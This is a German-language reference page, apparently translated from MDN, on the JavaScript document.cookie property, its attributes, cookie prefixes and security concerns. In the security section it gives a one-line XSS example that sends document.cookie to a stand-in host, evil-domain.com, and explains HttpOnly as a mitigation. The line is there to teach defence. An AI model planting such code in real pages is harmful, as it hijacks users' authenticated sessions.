Dokument: cookie-Eigenschaft

allCookies = document.cookie;

Im obigen Code ist allCookies ein String, der eine durch Semikolon getrennte Liste aller Cookies (d.h. key=value-Paare) enthält. Beachten Sie, dass jedes key und value von Leerzeichen (Leer- und Tabulatorzeichen) umgeben sein kann: tatsächlich fordert RFC 6265 ein einzelnes Leerzeichen nach jedem Semikolon, aber einige Benutzeragenten halten sich möglicherweise nicht daran.

document.cookie = newCookie;

Im obigen Code ist newCookie ein String der Form key=value, der das zu setzende oder zu aktualisierende Cookie angibt. Beachten Sie, dass Sie mit dieser Methode immer nur ein Cookie gleichzeitig setzen oder aktualisieren können. Beachten Sie auch, dass:

• Jedes der folgenden Cookie-Attribut-Werte optional dem Schlüssel-Wert-Paar folgen kann, wobei jedes durch ein Semikolon getrennt wird:

  • ;domain=domain (z. B. example.com oder subdomain.example.com): Der Host, an den das Cookie gesendet wird. Wenn nicht angegeben, wird der Hostanteil des aktuellen Dokumentstandorts standardmäßig verwendet und das Cookie ist auf Subdomains nicht verfügbar. Wenn ein Domain angegeben wird, sind Subdomains immer eingeschlossen. Entgegen früheren Spezifikationen werden führende Punkte in Domainnamen ignoriert, aber Browser können sich weigern, das Cookie zu setzen, das solche Punkte enthält.

    Hinweis: Die Domain muss mit der Domain des JavaScript-Ursprungs übereinstimmen. Das Setzen von Cookies auf fremde Domains wird stillschweigend ignoriert.

  • ;expires=date-in-UTCString-format: Das Ablaufdatum des Cookies. Wenn weder expires noch max-age angegeben ist, verfällt es am Ende der Sitzung.

    Warnung: Wenn der Schutz der Privatsphäre des Benutzers von Bedeutung ist, ist es wichtig, dass eine Webanwendung die Cookie-Daten nach einem bestimmten Timeout ungültig macht, anstatt sich darauf zu verlassen, dass der Browser dies tut. Viele Browser erlauben es Benutzern, anzugeben, dass Cookies niemals ablaufen sollten, was nicht unbedingt sicher ist.

    Siehe Date.toUTCString() für Hilfe bei der Formatierung dieses Wertes.

  • ;max-age=max-age-in-seconds: Die maximale Lebensdauer des Cookies in Sekunden (z. B. 60*60*24*365 oder 31536000 für ein Jahr).

  • ;partitioned: Gibt an, dass das Cookie mit partitioniertem Speicher gespeichert werden soll. Weitere Informationen finden Sie unter Cookies Having Independent Partitioned State (CHIPS).

  • ;path=path: Der Wert des Path-Attributs des Cookies (siehe Bestimmen, wohin Cookies gesendet werden für weitere Informationen).

  • ;samesite: Das SameSite-Attribut eines Set-Cookie Headers kann von einem Server gesetzt werden, um anzugeben, wann das Cookie gesendet wird. Mögliche Werte sind lax, strict oder none (siehe auch Steuern von Drittanbieter-Cookies mit SameSite).

    • Der lax-Wert sendet das Cookie für alle Same-Site-Anfragen und Top-Level-Navigation-GET-Anfragen. Dies reicht für das Benutzer-Tracking aus, verhindert jedoch viele Cross-Site Request Forgery (CSRF) Angriffe. Dies ist der Standardwert in modernen Browsern.
    • Der strict-Wert verhindert, dass das Cookie vom Browser an die Zielseite in allen Cross-Site-Browsing-Kontexten gesendet wird, selbst beim Folgen eines regulären Links.
    • Der none-Wert gibt ausdrücklich an, dass keine Einschränkungen gelten. Das Cookie wird in allen Anfragen gesendet - sowohl Cross-Site als auch Same-Site.

  • ;secure: Gibt an, dass das Cookie nur über ein sicheres Protokoll übertragen werden soll.

• Der Cookie-Wert-String kann encodeURIComponent() verwenden, um sicherzustellen, dass der String keine Kommas, Semikolons oder Leerzeichen enthält (die in Cookie-Werten nicht erlaubt sind).

• Einige Benutzeragenten-Implementierungen unterstützen die folgenden Cookie-Präfixe:

  • __Secure- Signaliert dem Browser, dass er das Cookie nur in Anfragen einbeziehen soll, die über einen sicheren Kanal übertragen werden.
  • __Host- Signaliert dem Browser, dass zusätzlich zur Einschränkung, das Cookie nur aus einem sicheren Ursprung zu verwenden, der Geltungsbereich des Cookies auf ein Pfad-Attribut beschränkt ist, das vom Server übergeben wird. Wenn der Server das Pfad-Attribut weglässt, wird das "Verzeichnis" der Anforderungs-URI verwendet. Es signalisiert auch, dass das Domain-Attribut nicht vorhanden sein darf, was verhindert, dass das Cookie an andere Domains gesendet wird. Für Chrome muss das Pfad-Attribut immer der Ursprung sein.

  Hinweis: Der Bindestrich wird als Teil des Präfixes betrachtet.

  Hinweis: Diese Flags sind nur mit dem secure-Attribut einstellbar.

Um den folgenden Code zu verwenden, ersetzen Sie bitte alle Vorkommen des Wortes doSomethingOnlyOnce (der Name des Cookies) durch einen eigenen Namen.

function doOnce() {
  if (
    !document.cookie
      .split("; ")
      .find((row) => row.startsWith("doSomethingOnlyOnce"))
  ) {
    // Note that we are setting `SameSite=None;` in this example because the example
    // needs to work cross-origin.
    // It is more common not to set the `SameSite` attribute, which results in the default,
    // and more secure, value of `SameSite=Lax;`
    document.cookie =
      "doSomethingOnlyOnce=true; expires=Fri, 31 Dec 9999 23:59:59 GMT; SameSite=None; Secure";

    const output = document.getElementById("do-once");
    output.textContent = "> Do something here!";
  }
}

function clearOutputDoOnce() {
  const output = document.getElementById("do-once");
  output.textContent = "";
}

<button onclick="doOnce()">Only do something once</button>

<button onclick="clearOutputDoOnce()">Clear</button>

<div>
  <code id="do-once"></code>
</div>

Es ist wichtig zu beachten, dass das path-Attribut nicht vor unbefugtem Lesen des Cookies von einem anderen Pfad aus schützt. Es kann leicht unter Umgehung des DOMs umgangen werden, indem zum Beispiel ein verstecktes <iframe>-Element mit dem Pfad des Cookies erstellt und dann die contentDocument.cookie-Eigenschaft dieses iframes aufgerufen wird. Der einzige Weg, das Cookie zu schützen, ist die Verwendung einer anderen Domain oder Subdomain aufgrund der Same-Origin-Policy.

Cookies werden häufig in Webanwendungen verwendet, um einen Benutzer und seine authentifizierte Sitzung zu identifizieren. Das Stehlen eines Cookies von einer Webanwendung führt zur Entführung der authentifizierten Benutzersitzung. Häufige Methoden, um Cookies zu stehlen, sind die Verwendung von Social Engineering oder die Ausnutzung einer Cross-Site-Scripting (XSS) Schwachstelle in der Anwendung -

new Image().src = `http://www.evil-domain.com/steal-cookie.php?cookie=${document.cookie}`;

Das HTTPOnly-Cookie-Attribut kann helfen, diesen Angriff zu mildern, indem der Zugriff auf den Cookie-Wert durch JavaScript verhindert wird. Lesen Sie mehr über Cookies und Sicherheit.

• Ab Firefox 2 steht ein besserer Mechanismus für die clientseitige Speicherung zur Verfügung - WHATWG DOM Storage.
• Sie können ein Cookie löschen, indem Sie seine Ablaufzeit auf null setzen.
• Bedenken Sie, dass je mehr Cookies Sie haben, desto mehr Daten zwischen dem Server und dem Client für jede Anfrage übertragen werden. Dies führt dazu, dass jede Anfrage langsamer wird. Es wird dringend empfohlen, WHATWG DOM Storage zu verwenden, wenn Sie "nur clientseitige" Daten speichern möchten.
• RFC 2965 (Abschnitt 5.3, "Implementation Limits") gibt an, dass es kein maximales Längenlimit für die Schlüssel- oder Wertgröße eines Cookies geben sollte und ermutigt Implementierungen, beliebig große Cookies zu unterstützen. Die maximale Implementierung jedes Browsers wird zwangsläufig unterschiedlich sein, daher konsultieren Sie die Dokumentation einzelner Browser.

Der Grund für die Syntax der document.cookie-Zugriffseigenschaft liegt in der Client-Server-Natur von Cookies, die sich von anderen Client-Client-Speichermethoden unterscheidet (wie zum Beispiel localStorage):

• HTTP-Cookies
• DOM Storage
• URL.pathname
• Date.toUTCString()
• RFC 2965